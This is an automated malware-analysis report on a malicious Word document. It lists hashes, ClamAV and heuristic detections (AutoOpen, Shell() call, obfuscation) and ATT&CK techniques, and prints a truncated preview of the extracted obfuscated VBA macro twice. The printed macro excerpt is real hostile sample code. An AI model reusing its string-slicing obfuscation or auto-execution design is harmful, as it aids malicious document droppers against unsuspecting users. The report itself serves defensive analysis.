Office (OLE) malware analysis — malicious · 507de07a48431d32

MALICIOUS

Office (OLE)

86.0 KB Created: 2017-10-16 13:31:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 74693b5762563fa25626d8aaed59ce23 SHA-1: 8517d78b5a91b67afcf93da8aea61ad72d063483 SHA-256: 507de07a48431d321a48e6ff7e20034ad92962bc12fb5ccabf79c7b13f6ae4fc

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by ClamAV detection and heuristics flagging auto-execution and obfuscation. The specific payload or target of the Shell() command could not be determined due to obfuscation.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13506 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13506 bytes
SHA-256: `c2b33eb83b7ea6c184774bc2fa383bbd7f486dc5a0c4a6ba1dbe90c352d36e2a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub oZkwrXtbA() ZBiqKsNS = "U9GLJSBMXVMQYSHMNZvpFjLpEwiAiMzkOzuCiRrRPXBjiZWEXOXAlwkwbhONBPG5TY2D81GG" CYvVrLCCYo = Mid(ZBiqKsNS, 18, 42) zjPCjikZXJ = CYvVrLCCYo ovfWDE = "KV5GYP9BG2EEdWrwwzOpKSnSFwInULNBhlzJcKvWXOakKbWGFYjOTZuFvjlthzQwXqXrXhUm8ON9YQD2NUXSNF9GL" zKjXzuzU = Mid(ovfWDE, 12, 61) wwkjEdOOi = zKjXzuzU DKjQnasEtvq = "G4EDDLSHWCQwWjPJziLfliarMKUfAmEjWQCtMtUALY88C3QGUJLYJG5AFA" zJwlFCwpDWs = Mid(DKjQnasEtvq, 7, 32) qjffMtaIzD = zJwlFCwpDWs zvaLiwuZn = "LDPG4LY3RUXZPU6TQ60JJCCdndOV08FGGL" hDASiqwpp = Mid(zvaLiwuZn, 22, 5) YSMBVIiDdp = hDASiqwpp qvwzsi = "ZRUQP85UH1UI9L526EW8LsYfiFzGiurvuImdQTpfIJHvrqKlzkKfJjzZDjhAzVmnJVOnYXRApbqFkdnruPDFRJKY" uddbBhwOYzC = Mid(qvwzsi, 22, 60) NciZb = uddbBhwOYzC mIVWTN = "CCRKWUPXWHZV9C1phnWHXERBS9OVZM1" CEIotnnzAd = Mid(mIVWTN, 16, 4) waPQqwodB = CEIotnnzAd tMpjujAZHz = "CTKL1GOVI5VA9BGucjRjDAWY" RXipMiC = Mid(tMpjujAZHz, 14, 9) XWumfEHE = RXipMiC VcNJMnZ = "P31OJzjMmOIMahmGUV9SM3KXVUGYM9E5JXUGJ1TO73CE9" JzXmi = Mid(VcNJMnZ, 4, 12) jtdmP = JzXmi MczpB = "6GQ11DXEM1G8LCsRwsDIdaBiviziIrtOvYCoawbMUEiiXEuMaIwNsYITfPUTYHOAiM3PADDCTMI69AKRJE" NRqiwOfzMH = Mid(MczpB, 14, 52) HVLdMCqjj = NRqiwOfzMH POMiQivqW = "MP2QYTUAOHzzBzQujKFCQG8XDUG" aIFUarIriOU = Mid(POMiQivqW, 8, 10) kQkzhk = aIFUarIriOU VObFKN = "F73BZRQXYTmGBOI" UQTNCdwtR = Mid(VObFKN, 10, 2) LjkwW = UQTNCdwtR uwjGCYtZlqh = "RCFVHDcjRPGLDakjtXIZ2WZEUIOL8VC4L1ALRHRC1AM9VR7YQCEXD" jIPoFVu = Mid(uwjGCYtZlqh, 4, 14) AuzIIvGAZp = jIPoFVu dKKVwz = "LL7MQVLVIZDVX2LWcXMaTKphquoZP" bzHStzvdjzu = Mid(dKKVwz, 16, 12) WJqKiS = bzHStzvdjzu Dtirwws = "JhVnhLwFAZCLaWEFijvckipwHzFwwRfKQfORcOPFzbViBQIvLAhUfHwODTC9KND8LLO1EY" VtlEmAcDozi = Mid(Dtirwws, 2, 55) lbSBojbvwDR = VtlEmAcDozi XwAScJ = "7SHpnctAcjwqnnLXiiZihcLfZdcPozwRPvbBS71XI7317X8P88L92PQY5R9" NsoPVrIHYRN = Mid(XwAScJ, 4, 33) hKZkDASNztf = NsoPVrIHYRN JNhUCw = "SFQJTYNzDrwQroZvTKrknHAtfVXQiJKdInMpdDDfjMXRzzAkiXMFdilUQDWSHALIZFXB" wRKvAU = Mid(JNhUCw, 5, 51) bDFzKQ = wRKvAU dzUcLiOFY = "" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + "com" + "ments" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + jnjJrLiT + fOlpwM + JrHYvzM + FUicC + TmUnzpa pCICophJua = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8763), 83) splWwzcUKuc = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3021), 73) JrWhakihRR = Right(Left((lMJwjVCjz(dzUcLiOFY)), 1589), 31) uzicajA = Right(Left((lMJwjVCjz(dzUcLiOFY)), 3992), 103) rIdJajtD = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3807), 14) aQOiwKbTqnS = Right(Left((lMJwjVCjz(dzUcLiOFY)), 8997), 54) WDBzzrkK = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 762), 106) LSitXAB = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 14562), 89) lXoCfTjR = Mid((lMJwjVCjz(dzUcLiOFY)), 553, 63) KkKQkGG = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 4384), 36) vMvjwzDMP = Right(Left((lMJwjVCjz(dzUcLiOFY)), 15025), 143) Towop = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10063), 116) AVjRZluRj = Right(Left((lMJwjVCjz(dzUcLiOFY)), 9950), 73) wmRbR = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 15163), 68) poqFcGQ = Mid((lMJwjVCjz(dzUcLiOFY)), 12536, 109) wVlVbkYFCCd = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10886), 38) ojNCKQ = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 2253), 51) rXEXzLrvta = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8190), 55) rzwzfaOO = Right(Left((lMJwjVCjz(dzUcLiOFY)), 12455), 29) OPdfzJra = Mid((lMJwjVCjz(dzUcLiOFY)), 15351, 124) VI ... (truncated)

SHA-256: c2b33eb83b7ea6c184774bc2fa383bbd7f486dc5a0c4a6ba1dbe90c352d36e2a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub oZkwrXtbA()
ZBiqKsNS = "U9GLJSBMXVMQYSHMNZvpFjLpEwiAiMzkOzuCiRrRPXBjiZWEXOXAlwkwbhONBPG5TY2D81GG"
CYvVrLCCYo = Mid(ZBiqKsNS, 18, 42)
zjPCjikZXJ = CYvVrLCCYo
ovfWDE = "KV5GYP9BG2EEdWrwwzOpKSnSFwInULNBhlzJcKvWXOakKbWGFYjOTZuFvjlthzQwXqXrXhUm8ON9YQD2NUXSNF9GL"
zKjXzuzU = Mid(ovfWDE, 12, 61)
wwkjEdOOi = zKjXzuzU
DKjQnasEtvq = "G4EDDLSHWCQwWjPJziLfliarMKUfAmEjWQCtMtUALY88C3QGUJLYJG5AFA"
zJwlFCwpDWs = Mid(DKjQnasEtvq, 7, 32)
qjffMtaIzD = zJwlFCwpDWs
zvaLiwuZn = "LDPG4LY3RUXZPU6TQ60JJCCdndOV08FGGL"
hDASiqwpp = Mid(zvaLiwuZn, 22, 5)
YSMBVIiDdp = hDASiqwpp
qvwzsi = "ZRUQP85UH1UI9L526EW8LsYfiFzGiurvuImdQTpfIJHvrqKlzkKfJjzZDjhAzVmnJVOnYXRApbqFkdnruPDFRJKY"
uddbBhwOYzC = Mid(qvwzsi, 22, 60)
NciZb = uddbBhwOYzC
mIVWTN = "CCRKWUPXWHZV9C1phnWHXERBS9OVZM1"
CEIotnnzAd = Mid(mIVWTN, 16, 4)
waPQqwodB = CEIotnnzAd
tMpjujAZHz = "CTKL1GOVI5VA9BGucjRjDAWY"
RXipMiC = Mid(tMpjujAZHz, 14, 9)
XWumfEHE = RXipMiC
VcNJMnZ = "P31OJzjMmOIMahmGUV9SM3KXVUGYM9E5JXUGJ1TO73CE9"
JzXmi = Mid(VcNJMnZ, 4, 12)
jtdmP = JzXmi
MczpB = "6GQ11DXEM1G8LCsRwsDIdaBiviziIrtOvYCoawbMUEiiXEuMaIwNsYITfPUTYHOAiM3PADDCTMI69AKRJE"
NRqiwOfzMH = Mid(MczpB, 14, 52)
HVLdMCqjj = NRqiwOfzMH
POMiQivqW = "MP2QYTUAOHzzBzQujKFCQG8XDUG"
aIFUarIriOU = Mid(POMiQivqW, 8, 10)
kQkzhk = aIFUarIriOU
VObFKN = "F73BZRQXYTmGBOI"
UQTNCdwtR = Mid(VObFKN, 10, 2)
LjkwW = UQTNCdwtR
uwjGCYtZlqh = "RCFVHDcjRPGLDakjtXIZ2WZEUIOL8VC4L1ALRHRC1AM9VR7YQCEXD"
jIPoFVu = Mid(uwjGCYtZlqh, 4, 14)
AuzIIvGAZp = jIPoFVu
dKKVwz = "LL7MQVLVIZDVX2LWcXMaTKphquoZP"
bzHStzvdjzu = Mid(dKKVwz, 16, 12)
WJqKiS = bzHStzvdjzu
Dtirwws = "JhVnhLwFAZCLaWEFijvckipwHzFwwRfKQfORcOPFzbViBQIvLAhUfHwODTC9KND8LLO1EY"
VtlEmAcDozi = Mid(Dtirwws, 2, 55)
lbSBojbvwDR = VtlEmAcDozi
XwAScJ = "7SHpnctAcjwqnnLXiiZihcLfZdcPozwRPvbBS71XI7317X8P88L92PQY5R9"
NsoPVrIHYRN = Mid(XwAScJ, 4, 33)
hKZkDASNztf = NsoPVrIHYRN
JNhUCw = "SFQJTYNzDrwQroZvTKrknHAtfVXQiJKdInMpdDDfjMXRzzAkiXMFdilUQDWSHALIZFXB"
wRKvAU = Mid(JNhUCw, 5, 51)
bDFzKQ = wRKvAU
dzUcLiOFY = "" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + "com" + "ments" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + jnjJrLiT + fOlpwM + JrHYvzM + FUicC + TmUnzpa
pCICophJua = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8763), 83)
splWwzcUKuc = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3021), 73)
JrWhakihRR = Right(Left((lMJwjVCjz(dzUcLiOFY)), 1589), 31)
uzicajA = Right(Left((lMJwjVCjz(dzUcLiOFY)), 3992), 103)
rIdJajtD = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3807), 14)
aQOiwKbTqnS = Right(Left((lMJwjVCjz(dzUcLiOFY)), 8997), 54)
WDBzzrkK = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 762), 106)
LSitXAB = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 14562), 89)
lXoCfTjR = Mid((lMJwjVCjz(dzUcLiOFY)), 553, 63)
KkKQkGG = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 4384), 36)
vMvjwzDMP = Right(Left((lMJwjVCjz(dzUcLiOFY)), 15025), 143)
Towop = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10063), 116)
AVjRZluRj = Right(Left((lMJwjVCjz(dzUcLiOFY)), 9950), 73)
wmRbR = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 15163), 68)
poqFcGQ = Mid((lMJwjVCjz(dzUcLiOFY)), 12536, 109)
wVlVbkYFCCd = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10886), 38)
ojNCKQ = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 2253), 51)
rXEXzLrvta = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8190), 55)
rzwzfaOO = Right(Left((lMJwjVCjz(dzUcLiOFY)), 12455), 29)
OPdfzJra = Mid((lMJwjVCjz(dzUcLiOFY)), 15351, 124)
VI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.